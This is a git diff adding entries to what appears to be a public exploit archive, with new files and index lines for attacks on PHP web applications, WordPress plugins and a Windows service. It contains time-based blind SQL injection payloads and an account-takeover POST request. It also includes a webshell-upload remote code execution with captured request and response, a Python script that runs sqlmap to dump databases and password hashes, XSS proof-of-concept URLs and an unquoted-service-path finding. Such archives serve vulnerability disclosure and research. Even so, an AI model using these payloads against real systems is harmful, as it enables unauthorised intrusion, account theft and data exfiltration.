diff --git a/exploits/php/webapps/50729.txt b/exploits/php/webapps/50729.txt new file mode 100644 index 000000000..22c4113a6 --- /dev/null +++ b/exploits/php/webapps/50729.txt @@ -0,0 +1,34 @@ +# Exploit Title: Hospital Management Startup 1.0 - 'loginid' SQLi +# Exploit Author: nu11secur1ty +# Date: 02.10.2022 +# Vendor: https://github.com/kabirkhyrul +# Software: https://github.com/kabirkhyrul/HMS +# CVE-2022-23366 + +# Description: +The loginid and password parameters from Hospital Management Startup +1.0 appear to be vulnerable to SQL injection attacks. +The attacker can retrieve all information from the administrator +account of the system and he can use the information for malicious +purposes! +WARNING: If this is in some external domain, or some subdomain, or +internal, this will be extremely dangerous! + +Status: CRITICAL + + +[+] Payloads: + +```mysql +--- +Parameter: loginid (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND +(SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND +'sDHP'='sDHP&rememberme=on&submit=Login +--- + +``` +# Reproduce: +https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366 \ No newline at end of file diff --git a/exploits/php/webapps/50730.txt b/exploits/php/webapps/50730.txt new file mode 100644 index 000000000..10a0a1c08 --- /dev/null +++ b/exploits/php/webapps/50730.txt @@ -0,0 +1,65 @@ +# Exploit Title: Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated) +# Date: 9/02/2022 +# Exploit Author: Saud Alenazi +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html +# Version: 1.0 +# Tested on: XAMPP, Linux + + +Home Owners Collection Management System is vulnerable to unauthenticated account takeover. +An attacker can takeover any registered 'Staff' user account by just sending below POST request +By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters + +#Steps to Reproduce + +1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters. + +2. Go to http://localhost/hocms/admin/ and Log in to the user account by changed username and password + + +============================================== + +POST /hocms/classes/Users.php?f=save HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------8012296389370411172619882391 +Content-Length: 899 +Origin: http://localhost +Connection: close +Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju + +-----------------------------8012296389370411172619882391 +Content-Disposition: form-data; name="id" + + +-----------------------------8012296389370411172619882391 +Content-Disposition: form-data; name="firstname" + +hi +-----------------------------8012296389370411172619882391 +Content-Disposition: form-data; name="lastname" + +test +-----------------------------8012296389370411172619882391 +Content-Disposition: form-data; name="username" + +saud +-----------------------------8012296389370411172619882391 +Content-Disposition: form-data; name="password" + +saud +-----------------------------8012296389370411172619882391 +Content-Disposition: form-data; name="type" + +1 +-----------------------------8012296389370411172619882391 +Content-Disposition: form-data; name="img"; filename="" +Content-Type: application/octet-stream + + +-----------------------------8012296389370411172619882391-- \ No newline at end of file diff --git a/exploits/php/webapps/50731.txt b/exploits/php/webapps/50731.txt new file mode 100644 index 000000000..b008dd6a1 --- /dev/null +++ b/exploits/php/webapps/50731.txt @@ -0,0 +1,119 @@ +# Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated) +# Date: 9/02/2022 +# Exploit Author: Saud Alenazi +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html +# Version: 1.0 +# Tested on: XAMPP, Linux + +# Request sent as base user + +POST /hocms/classes/SystemSettings.php?f=update_settings HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------31935477191495174627236953215 +Content-Length: 769 +Origin: http://localhost +Connection: close +Referer: http://localhost/hocms/admin/?page=system_info +Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju + + +-----------------------------31935477191495174627236953215 +Content-Disposition: form-data; name="name" + + + +Home Owners Collection Management System' + +-----------------------------31935477191495174627236953215 +Content-Disposition: form-data; name="short_name" + + + +HOCMS - PHP + +-----------------------------31935477191495174627236953215 +Content-Disposition: form-data; name="img"; filename="" +Content-Type: application/octet-stream + + + + + +-----------------------------31935477191495174627236953215 +Content-Disposition: form-data; name="cover"; filename="cmd.php" +Content-Type: application/x-php + + + + + + + + + +-----------------------------31935477191495174627236953215-- + + +# Response + +HTTP/1.1 200 OK +Date: Wed, 09 Feb 2022 09:32:16 GMT +Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1 +X-Powered-By: PHP/8.1.2 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Access-Control-Allow-Origin: * +Content-Length: 1 +Connection: close +Content-Type: text/html; charset=UTF-8 + + + +1 + + +# ------------------------------------------------------------------------------------------ +# Request to webshell +# ------------------------------------------------------------------------------------------ + +GET /hocms/uploads/1644399120_cmd.php?s=echo+0xSaudi HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju +Upgrade-Insecure-Requests: 1 + + +# ------------------------------------------------------------------------------------------ +# Webshell response +# ------------------------------------------------------------------------------------------ + +HTTP/1.1 200 OK +Date: Wed, 09 Feb 2022 09:39:06 GMT +Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1 +X-Powered-By: PHP/8.1.2 +Access-Control-Allow-Origin: * +Content-Length: 33 +Connection: close +Content-Type: text/html; charset=UTF-8 + + + +0xSaudi + + + \ No newline at end of file diff --git a/exploits/php/webapps/50732.txt b/exploits/php/webapps/50732.txt new file mode 100644 index 000000000..992226762 --- /dev/null +++ b/exploits/php/webapps/50732.txt @@ -0,0 +1,26 @@ +# Exploit Title: Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection +# Date: 9/02/2022 +# Exploit Author: Saud Alenazi +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html +# Version: 1.0 +# Tested on: XAMPP, Windows 10 + + +# Vulnerable Code + +line 68 in file "/hocms/admin/members/view_member.php" + +$collection = $conn->query("SELECT * FROM `collection_list` where member_id = '{$id}' order by date(date_collected) desc"); + + +# Sqlmap command: + +sqlmap -u 'http://localhost/hocms/admin/?id=0&page=members/view_member' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch + +# Output: + +Parameter: id (GET) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: id=0' AND (SELECT 9980 FROM (SELECT(SLEEP(5)))POvo)-- OyKE&page=members/view_member \ No newline at end of file diff --git a/exploits/php/webapps/50733.py b/exploits/php/webapps/50733.py new file mode 100755 index 000000000..dec7ac4c3 --- /dev/null +++ b/exploits/php/webapps/50733.py @@ -0,0 +1,64 @@ +# Exploit Title: WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated) +# Date 08.02.2022 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://ays-pro.com/ +# Software Link: https://downloads.wordpress.org/plugin/secure-copy-content-protection.2.8.1.zip +# Version: < 2.8.2 +# Tested on: Ubuntu 20.04 +# CVE: CVE-2021-24931 +# CWE: CWE-89 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24931/README.md + +''' +Description: +The Secure Copy Content Protection and Content Locking WordPress plugin before 2.8.2 does not escape the +sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated +and authenticated users) before using it in a SQL statement, leading to an SQL injection. +''' + +banner = ''' + + .--. .-..-. .--. .---. .--. .---. ,-. .---. .-. .--. .----. ,-. +: .--': :: :: .--' `--. :: ,. :`--. :.' : `--. : .'.': .; :`-- ;.' : +: : : :: :: `; _____ ,',': :: : ,',' `: : _____ ,','.'.'_`._, : .' ' `: : +: :__ : `' ;: :__:_____:.'.'_ : :; :.'.'_ : ::_____:.'.'_ :_ ` : : : _`,`. : : +`.__.' `.,' `.__.' :____;`.__.':____; :_; :____; :_: :_:`.__.' :_; + + [+] Copy Content Protection and Content Locking - SQL Injection + [@] Developed by Ron Jost (Hacker5preme) + +''' +print(banner) +import argparse +from datetime import datetime +import os + +# User-Input: +my_parser = argparse.ArgumentParser(description= 'Copy Content Protection and Content Locking SQL-Injection (unauthenticated)') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +wp_path = args.PATH + +# Exploit: +print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) +print('[*] Payload for SQL-Injection:') +exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)*&type=json" ' +print(' Sqlmap options:') +print(' -a, --all Retrieve everything') +print(' -b, --banner Retrieve DBMS banner') +print(' --current-user Retrieve DBMS current user') +print(' --current-db Retrieve DBMS current database') +print(' --passwords Enumerate DBMS users password hashes') +print(' --tables Enumerate DBMS database tables') +print(' --columns Enumerate DBMS database table column') +print(' --schema Enumerate DBMS schema') +print(' --dump Dump DBMS database table entries') +print(' --dump-all Dump all DBMS databases tables entries') +retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') +exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0' +os.system(exploitcode) +print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S'))) \ No newline at end of file diff --git a/exploits/php/webapps/50734.txt b/exploits/php/webapps/50734.txt new file mode 100644 index 000000000..8dc4efd4b --- /dev/null +++ b/exploits/php/webapps/50734.txt @@ -0,0 +1,13 @@ +# Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS) +# Date: 2022-02-07 +# Author: Milad karimi +# Software Link: https://wordpress.org/plugins/contact-forms-builder/ +# Version: 1.6.1 +# Tested on: Windows 11 +# CVE: N/A + +1. Description: +This plugin creates a Contact Form Builder from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. + +2. Proof of Concept: +http://localhost/code_generator.php?form_id= \ No newline at end of file diff --git a/exploits/php/webapps/50735.txt b/exploits/php/webapps/50735.txt new file mode 100644 index 000000000..305e1ac2b --- /dev/null +++ b/exploits/php/webapps/50735.txt @@ -0,0 +1,13 @@ +# Exploit Title: WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS) +# Date: 2022-02-07 +# Author: Milad karimi +# Software Link: https://wordpress.org/plugins/jetpack +# Version: 9.1 +# Tested on: Windows 11 +# CVE: N/A + +1. Description: +This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. + +2. Proof of Concept: +http://localhost/modules/contact-form/grunion-form-view.php?post_id= \ No newline at end of file diff --git a/exploits/windows/local/50728.txt b/exploits/windows/local/50728.txt new file mode 100644 index 000000000..682f775bd --- /dev/null +++ b/exploits/windows/local/50728.txt @@ -0,0 +1,19 @@ +# Exploit Title: Cain & Abel 4.9.56 - Unquoted Service Path +# Exploit Author: Aryan Chehreghani +# Date: 2022-02-08 +# Software Link: https://www.malavida.com/en/soft/cain-and-abel +# Version: 4.9.56 +# Tested on: Windows 10 x64 + +# PoC + +SERVICE_NAME: Abel + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Cain\Abel64.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Abel + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 416d9098c..1054b5176 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11438,6 +11438,7 @@ id,file,description,date,author,type,platform,port 50691,exploits/windows/local/50691.txt,"Mozilla Firefox 67 - Array.pop JIT Type Confusion",1970-01-01,"Forrest Orr",local,windows, 50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",1970-01-01,LiquidWorm,local,macos, 50708,exploits/windows/local/50708.txt,"FLAME II MODEM USB - Unquoted Service Path",1970-01-01,"Ismael Nava",local,windows, +50728,exploits/windows/local/50728.txt,"Cain & Abel 4.9.56 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -44802,3 +44803,10 @@ id,file,description,date,author,type,platform,port 50725,exploits/php/webapps/50725.txt,"Exam Reviewer Management System 1.0 - ‘id’ SQL Injection",1970-01-01,"Juli Agarwal",webapps,php, 50726,exploits/php/webapps/50726.txt,"Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Juli Agarwal",webapps,php, 50727,exploits/php/webapps/50727.txt,"AtomCMS v2.0 - SQLi",1970-01-01,"Luca Cuzzolin",webapps,php, +50729,exploits/php/webapps/50729.txt,"Hospital Management Startup 1.0 - 'Multiple' SQLi",1970-01-01,nu11secur1ty,webapps,php, +50730,exploits/php/webapps/50730.txt,"Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)",1970-01-01,"Saud Alenazi",webapps,php, +50731,exploits/php/webapps/50731.txt,"Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Saud Alenazi",webapps,php, +50732,exploits/php/webapps/50732.txt,"Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection",1970-01-01,"Saud Alenazi",webapps,php, +50733,exploits/php/webapps/50733.py,"WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php, +50734,exploits/php/webapps/50734.txt,"WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php, +50735,exploits/php/webapps/50735.txt,"WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php,